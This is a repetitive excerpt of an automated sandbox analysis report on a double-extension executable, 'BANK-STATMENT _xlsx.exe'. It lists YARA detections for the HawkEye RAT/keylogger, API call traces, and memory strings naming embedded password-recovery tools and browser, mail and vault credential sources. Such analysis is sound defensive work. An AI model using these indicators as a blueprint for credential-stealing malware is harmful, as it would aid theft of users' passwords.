                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00454818 NtdllDefWindowProc_A,0_2_00454818
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00455044
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00449408 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_00449408
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_0042D6D0 NtdllDefWindowProc_A,0_2_0042D6D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_004397C4 NtdllDefWindowProc_A,GetCapture,0_2_004397C4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 1_2_00490159 NtCreateSection,1_2_00490159
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 2_2_00454818 NtdllDefWindowProc_A,2_2_00454818
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 2_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 2_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_00455044
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 2_2_00449408 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,2_2_00449408
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 2_2_0042D6D0 NtdllDefWindowProc_A,2_2_0042D6D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 2_2_004397C4 NtdllDefWindowProc_A,GetCapture,2_2_004397C4
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,7_2_00408836
                Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: BANK-STATMENT _xlsx.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.665995495.00000000023A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: OriginalFilename vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: OriginalFileName vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.767713264.0000000002432000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788122211.0000000002340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799067734.00000000022D2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000010.00000002.812025899.0000000002260000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870211427.0000000002822000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.869457392.00000000022B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.884712791.0000000002AC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882472409.0000000000482000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882825216.00000000007A2000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001F.00000002.892381950.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903544550.00000000026C2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.902870919.0000000002340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmpBinary or memory string: w: %Scannot create INSTEAD OF trigger on table: %SINSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')type='trigger' AND name='%q'no such trigger: %Sno such column: %srows updated_rowid_cannot VACUUM from within a transactioncannot VACUUM - SQL statements in progressATTACH ':memory:' AS vacuum_db;ATTACH '' AS vacuum_db;PRAGMA vacuum_db.synchronous=OFFBEGIN EXCLUSIVE;SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' 
|| quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)CREATE VIRTUAL TABLE %TUPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%dname='%q' AND type='table'vtable constructor failed: %svtable constructor did not declare schema: %shidden hiddenno such module: %sNOCASEauto-indextable %s: xBestIndex returned an invalid planat most %d tables in a joincannot use index: %sparser stack overflowset listnear "%T": syntax errortoo many arguments on function %Tqualified table names are not allowed on INSERT, UPDATE, and DELETE statements within triggersthe INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggersthe NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggersinterruptunrecognized token: "%T"temp2011-01-28 17:03:50 ed759d5a9edb3bba5f48f243df47be29e3fe8cd7unable to close due to unfinalised statementsunable to close due to unfinished backup operationunknown errorunable to delete/modify user-function due to active statementsunknown database: %sunable to delete/modify collation sequence due to active statementsno such vfs: %sRTRIMmaindatabase corruption at line %d of [%.10s]misuse at line %d of [%.10s]cannot open file at line %d of [%.10s]\sqlite3.dll\mozsqlite3.dll\nss3.dllsqlite3_opensqlite3_preparesqlite3_stepsqlite3_column_textsqlite3_column_intsqlite3_column_int64sqlite3_finalizesqlite3_closesqlite3_exec\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNamelog profile.saveSIsignInvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultFreeVaultGetInformationVaultG
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912185796.0000000000760000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs BANK-STATMENT _xlsx.exe
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Section loaded: phoneinfo.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Section loaded: ext-ms-win-xblauth-console-l1.dll
                Source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
